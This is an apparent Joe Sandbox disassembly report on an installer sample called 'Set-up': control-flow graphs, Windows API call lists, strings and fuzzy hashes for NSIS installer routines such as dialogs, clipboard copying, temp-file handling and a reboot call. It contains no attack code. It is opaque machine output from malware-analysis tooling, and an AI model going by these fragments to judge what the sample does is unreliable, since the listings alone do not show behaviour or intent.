                                                                control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                                APIs
                                                                • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                • GetClientRect.USER32(?,?), ref: 00405196
                                                                • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                  • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                • ShowWindow.USER32(00000000), ref: 004052E7
                                                                • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                • ShowWindow.USER32(00000008), ref: 00405333
                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                • CreatePopupMenu.USER32 ref: 00405376
                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                • EmptyClipboard.USER32 ref: 00405411
                                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                • CloseClipboard.USER32 ref: 0040546E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                • String ID: @rD$New install of "%s" to "%s"${
                                                                • API String ID: 2110491804-2409696222
                                                                • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                                APIs
                                                                • #17.COMCTL32 ref: 004038A2
                                                                • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                  • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                  • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                  • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                • ExitProcess.KERNEL32 ref: 00403AF1
                                                                • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                • API String ID: 2435955865-239407132
                                                                • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 787 4074bb-4074c0 788 4074c2-4074ef 787->788 789 40752f-407547 787->789 791 4074f1-4074f4 788->791 792 4074f6-4074fa 788->792 790 407aeb-407aff 789->790 796 407b01-407b17 790->796 797 407b19-407b2c 790->797 793 407506-407509 791->793 794 407502 792->794 795 4074fc-407500 792->795 798 407527-40752a 793->798 799 40750b-407514 793->799 794->793 795->793 800 407b33-407b3a 796->800 797->800 803 4076f6-407713 798->803 804 407516 799->804 805 407519-407525 799->805 801 407b61-407c68 800->801 802 407b3c-407b40 800->802 818 407350 801->818 819 407cec 801->819 807 407b46-407b5e 802->807 808 407ccd-407cd4 802->808 810 407715-407729 803->810 811 40772b-40773e 803->811 804->805 806 407589-4075b6 805->806 814 4075d2-4075ec 806->814 815 4075b8-4075d0 806->815 807->801 812 407cdd-407cea 808->812 816 407741-40774b 810->816 811->816 817 407cef-407cf6 812->817 820 4075f0-4075fa 814->820 815->820 821 40774d 816->821 822 4076ee-4076f4 816->822 823 407357-40735b 818->823 824 40749b-4074b6 818->824 825 40746d-407471 818->825 826 4073ff-407403 818->826 819->817 829 407600 820->829 830 407571-407577 820->830 831 407845-4078a1 821->831 832 4076c9-4076cd 821->832 822->803 828 407692-40769c 822->828 823->812 833 407361-40736e 823->833 824->790 838 407c76-407c7d 825->838 839 407477-40748b 825->839 844 407409-407420 826->844 845 407c6d-407c74 826->845 834 4076a2-4076c4 828->834 835 407c9a-407ca1 828->835 847 407556-40756e 829->847 848 407c7f-407c86 829->848 836 40762a-407630 830->836 837 40757d-407583 830->837 831->790 840 407c91-407c98 832->840 841 4076d3-4076eb 832->841 833->819 849 407374-4073ba 833->849 834->831 835->812 850 40768e 836->850 851 407632-40764f 836->851 837->806 837->850 838->812 846 40748e-407496 839->846 840->812 841->822 852 407423-407427 844->852 845->812 846->825 856 407498 846->856 847->830 848->812 854 4073e2-4073e4 849->854 855 4073bc-4073c0 849->855 850->828 857 407651-407665 851->857 858 407667-40767a 851->858 852->826 853 407429-40742f 852->853 860 407431-407438 853->860 861 407459-40746b 853->861 864 4073f5-4073fd 854->864 865 4073e6-4073f3 854->865 862 4073c2-4073c5 GlobalFree 855->862 863 4073cb-4073d9 GlobalAlloc 855->863 856->824 859 40767d-407687 857->859 858->859 859->836 866 407689 859->866 867 407443-407453 GlobalAlloc 860->867 868 40743a-40743d GlobalFree 860->868 861->846 862->863 863->819 869 4073df 863->869 864->852 865->864 865->865 871 407c88-407c8f 866->871 872 40760f-407627 866->872 867->819 867->861 868->867 869->854 871->812 872->836
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                • String ID:
                                                                • API String ID: 310444273-0
                                                                • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: Find$CloseFileFirst
                                                                • String ID:
                                                                • API String ID: 2295610775-0
                                                                • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                                APIs
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                • ShowWindow.USER32(?), ref: 004054D2
                                                                • DestroyWindow.USER32 ref: 004054E6
                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                • GetDlgItem.USER32(?,?), ref: 00405523
                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                • EnableWindow.USER32(?,?), ref: 00405757
                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                • String ID: @rD
                                                                • API String ID: 3282139019-3814967855
                                                                • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 